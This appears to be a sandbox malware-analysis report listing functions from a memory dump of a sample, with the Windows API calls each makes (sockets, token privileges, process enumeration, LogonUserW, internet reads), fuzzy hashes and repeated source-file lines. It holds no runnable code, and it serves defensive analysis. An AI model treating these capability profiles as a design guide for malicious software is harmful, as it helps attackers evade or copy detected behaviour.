Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: e44cda78f96022488f8b90c51abb24f72471073e99d46a061ea336ddacad7a1b
Instruction ID: 107003bfdb5b2e5c14f6f4f0b420277281c000b1e8220809cd69975bccb74618
Opcode Fuzzy Hash: e44cda78f96022488f8b90c51abb24f72471073e99d46a061ea336ddacad7a1b
Instruction Fuzzy Hash: F841D175A00600AFEB14AF648C86F6E77E8DF45724F04D558FA59BB3D3CA709D408BA2

Function 00E85376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00E853C5
IsWindowEnabled.USER32 ref: 00E853D3
GetForegroundWindow.USER32(?,?,00000001), ref: 00E853E0
IsIconic.USER32 ref: 00E853EE
IsZoomed.USER32 ref: 00E853FC

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: c7dd46515eccb0ad50f8ea48941d879d53fbe4273d0762b1a84c7c3af94d61c5
Instruction ID: 3182644f9e835ee7c9af30aed30941d871b38da0505759427ca26a93bc370f8f
Opcode Fuzzy Hash: c7dd46515eccb0ad50f8ea48941d879d53fbe4273d0762b1a84c7c3af94d61c5
Instruction Fuzzy Hash: D911B232300911AFEB217F269C44A6A7B99FF447A1B505439F84EF7251DF709C4187A0

Function 00E580A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E580C0
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E580CA
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E580D9
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E580E0
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E580F6

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: f70cde26ba4d04e17bce5e089fd5856116e36d85f7f1c6abb5f1d94dc5eabf1c
Instruction ID: f325f17ada38344aaa19c215ba850c1c76573970159c1c155df275cbab9e8cb1
Opcode Fuzzy Hash: f70cde26ba4d04e17bce5e089fd5856116e36d85f7f1c6abb5f1d94dc5eabf1c
Instruction Fuzzy Hash: 1AF06231242304EFEB104FA6ED8DE673BACEF49759B100425F949F6150DB61DC49EB60

Function 00E04B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00E04AD0), ref: 00E04B45
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00E04B57

Strings

GetNativeSystemInfo, xrefs: 00E04B51
kernel32.dll, xrefs: 00E04B40

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: b8e616ddfd09f029ecfb5673ce8c16b0d4d21e6b73e51776172a8e16b672cc2e
Instruction ID: 14eb25156c0239955aa11ae88cc7347d0cbe2539141eb4302ce67b77bdcf7c71
Opcode Fuzzy Hash: b8e616ddfd09f029ecfb5673ce8c16b0d4d21e6b73e51776172a8e16b672cc2e
Instruction Fuzzy Hash: 0FD017B4A10B13CFD720AF32E928B0676E4AF45795B11983AD48EF6190E674E8C0CB54

Function 00E7EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00E7EE3D
Process32FirstW.KERNEL32(00000000,?), ref: 00E7EE4B

Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22

Process32NextW.KERNEL32(00000000,?), ref: 00E7EF0B
CloseHandle.KERNEL32(00000000,?,?,?), ref: 00E7EF1A

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 24b919ebe4df3402244ca2ecb94a5e1512ff63c3a276e513e718abfd8e870dc9
Instruction ID: 5940b931876251158b4681987b04865a5ad7e20c0f71ec4b0d20efc82db59308
Opcode Fuzzy Hash: 24b919ebe4df3402244ca2ecb94a5e1512ff63c3a276e513e718abfd8e870dc9
Instruction Fuzzy Hash: CE51A271504701AFD310EF20DC86E6BB7E8EF98710F50592DF595A72A2EB70E948CB92

Function 00E5E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 00E5E628

Strings

(, xrefs: 00E5E66E
|, xrefs: 00E5E658

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 4c9eb9e87c42c9e4821a3394ed91d366b65090882228a99817f0e389497a83d1
Instruction ID: cb0a725d7ea75cac03c23f9a596bee79619a369dc54dd1df49c75f24223f7a77
Opcode Fuzzy Hash: 4c9eb9e87c42c9e4821a3394ed91d366b65090882228a99817f0e389497a83d1
Instruction Fuzzy Hash: 11322775A007059FD728CF29C4819AAB7F1FF48310B15D96EE89AEB3A1D770E941CB44

Function 00E722EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00E7180A,00000000), ref: 00E723E1
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00E72418

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 2566a8a77958200f31b64fe5aeac27bdcb5d9d27d0ce75df0e7572a1829995cf
Instruction ID: 2d49e1a59a829b1b37dab41a80f357666d7d355273e78316376112f88cfed3a8
Opcode Fuzzy Hash: 2566a8a77958200f31b64fe5aeac27bdcb5d9d27d0ce75df0e7572a1829995cf
Instruction Fuzzy Hash: 5441F57190420ABFEB20DE95DC81EBB77FCEB40318F10A06EF759B6241EB759E419650

Function 00E6B3FB Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00E6B40B
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00E6B465
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00E6B4B2

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 63ff0e6bcec6eed41d47fc1ddd4d3da99003070b7191b413f9e70951f653e1a0
Instruction ID: d12c3c9f73388adc97181dff63b3b7c53efc4b534a4640154c168d5099d9b79b
Opcode Fuzzy Hash: 63ff0e6bcec6eed41d47fc1ddd4d3da99003070b7191b413f9e70951f653e1a0
Instruction Fuzzy Hash: 88213275A00118DFCB00EFA5D884AEDBBF8FF49314F1480A9E905EB352DB319955CB51

Function 00E587E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00E20DB6: std::exception::exception.LIBCMT ref: 00E20DEC
Part of subcall function 00E20DB6: __CxxThrowException@8.LIBCMT ref: 00E20E01

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E5882B
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E58858
GetLastError.KERNEL32 ref: 00E58865

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: dfca8af86a5a0bffd452b90809c26b5fa5450281aeab1175512c70a8a2ca3985
Instruction ID: 376e9207734bde2194d3ca6fb6b36d8010e22876c5b63c00fa7380ffa8db9593
Opcode Fuzzy Hash: dfca8af86a5a0bffd452b90809c26b5fa5450281aeab1175512c70a8a2ca3985
Instruction Fuzzy Hash: A511BFB2404204AFE718DFA4ED85D6BB7F8EB04315B60952EF856A3251EB30BC448B60

Function 00E5874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00E58774
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00E5878B
FreeSid.ADVAPI32(?), ref: 00E5879B

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: ac0923996efa3c2838f2130a1b9ce1812a1902477a405bd3ea93fa9c21ae77a1
Instruction ID: f43f20f24058d4aa527577105c0689161f408363a07310f8ee931bc3de24e714
Opcode Fuzzy Hash: ac0923996efa3c2838f2130a1b9ce1812a1902477a405bd3ea93fa9c21ae77a1
Instruction Fuzzy Hash: 2EF03775A11308BFDB00DFE49D89AAEBBB8EF08201F1044A9E905E2181E6756A089B50

Function 00E68889 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 00E6889B

Part of subcall function 00E2520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00E68F6E,00000000,?,?,?,?,00E6911F,00000000,?), ref: 00E25213
Part of subcall function 00E2520A: __aulldiv.LIBCMT ref: 00E25233

Strings

0e, xrefs: 00E68892

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID: 0e
API String ID: 2893107130-533242481
Opcode ID: 0f4e54ff9b82e6b8c6778b4349afedcaaae35e03c8a256d67305c0cbeb7e33e1
Instruction ID: 429b939a89a6b7b9b8296b7d62c8e6021a43521930828481d96b791280ef24aa
Opcode Fuzzy Hash: 0f4e54ff9b82e6b8c6778b4349afedcaaae35e03c8a256d67305c0cbeb7e33e1
Instruction Fuzzy Hash: 3C21AF326356108FC729CF29E841A52B3E1EBA5311B689F6CE0F5DB2D0CA75A909CB54

Function 00E64C7F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00E64CB3

Strings

DOWN, xrefs: 00E64C98

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: mouse_event
String ID: DOWN
API String ID: 2434400541-711622031
Opcode ID: 3b63c56a101e11022768fb8abdf34956ecb0895198d34094fe196f3447125e39
Instruction ID: f729362ce2e3f2dd68a7709a864a68286ad1764591fb2db372c86c44f8aa2267
Opcode Fuzzy Hash: 3b63c56a101e11022768fb8abdf34956ecb0895198d34094fe196f3447125e39
Instruction Fuzzy Hash: E5E046B22E97213CF9082A18BC02EFB02CC8B12375B21220AF814F51C2ED802C8225A8

Function 00E6C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00E6C6FB
FindClose.KERNEL32(00000000), ref: 00E6C72B

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 1b9671eeac4bde72a02e8b8eb009aa42b2ba0f54c7b26139aa1c5e0c2dd8597f
Instruction ID: 8d4c4d1c486ad380aba562e9253185eee862f76b973ad385d8ef530f4b4f388a
Opcode Fuzzy Hash: 1b9671eeac4bde72a02e8b8eb009aa42b2ba0f54c7b26139aa1c5e0c2dd8597f
Instruction Fuzzy Hash: EE1182716006009FDB10DF29D84592AF7E4EF85324F10C51EF8A9E7391DB30A805CB91

Function 00E6A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00E79468,?,00E8FB84,?), ref: 00E6A097
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00E79468,?,00E8FB84,?), ref: 00E6A0A9

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 6b183960610e91662c7885f4dbbd4410174326e8771da026a7372f819ff4f783
Instruction ID: 58772d43b1dc1fea1082bbf8f800e77dc076d06df5f2cffbebd64f293b1a1478
Opcode Fuzzy Hash: 6b183960610e91662c7885f4dbbd4410174326e8771da026a7372f819ff4f783
Instruction Fuzzy Hash: 52F0E23554422DABDB20AFA4DC48FEA776CBF083A1F004165F908F2181CA309944CBA1

Function 00E581CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E58309), ref: 00E581E0
CloseHandle.KERNEL32(?,?,00E58309), ref: 00E581F2

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 477864f977bed6d388d2517f0860294bfc6ade4f0f099990029b27e2a316580e
Instruction ID: 3ad5edba0b6b4157b1e5c2206112115f8a6e2bf2778e0e0f66ebe33fe90c9277
Opcode Fuzzy Hash: 477864f977bed6d388d2517f0860294bfc6ade4f0f099990029b27e2a316580e
Instruction Fuzzy Hash: B8E08C32000620AFEB212B61FC08D737BEAEF04311720982DF8AAE0471CB22AC90DB10

Function 00E2A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00E28D57,?,?,?,00000001), ref: 00E2A15A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00E2A163

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 6c4849efe7a0ff1c54eae10928979c07c512a46dc63bde4281134e2965fff092
Instruction ID: e5e96650a48eef351b6382d28677995d01af2e62a20109302c912e9c00a1526b
Opcode Fuzzy Hash: 6c4849efe7a0ff1c54eae10928979c07c512a46dc63bde4281134e2965fff092
Instruction Fuzzy Hash: 21B09231254308AFCA002B92EC09B883F68EB46AA2F404020F60D94060CB6254548B91

Function 00E2F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 948773515dfefe471a8f46c89856d15cb35807f24706d5192141743c8be69132
Instruction ID: 2b3b1e7623b84cd5dab6c878d3a77201d816f266c5b857ca65f5a1a318f47171
Opcode Fuzzy Hash: 948773515dfefe471a8f46c89856d15cb35807f24706d5192141743c8be69132
Instruction Fuzzy Hash: 0F322522D29F114DD7279635D832335A299AFB73C8F15E737F81AB5AA5EB28C4C74100

Function 00E3242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dff6ceaf32f0abedb99080420e9491856f31b4ec1517edebbfdc32b944a9a2f8
Instruction ID: db686e5db0e0fd49e0535164538e448f0634956c7a8edd785cc3e4530addb596
Opcode Fuzzy Hash: dff6ceaf32f0abedb99080420e9491856f31b4ec1517edebbfdc32b944a9a2f8
Instruction Fuzzy Hash: 50B10130D2AF404DD723963A8835336BA9CAFBB2C5F55D72BFC6674D22EB2185874181

Function 00E587B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00E58389), ref: 00E587D1

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 0cabfa572a0816d57320f7ce2b6cd6c61a530b109ef0cf28cf78d2a62f2ad745
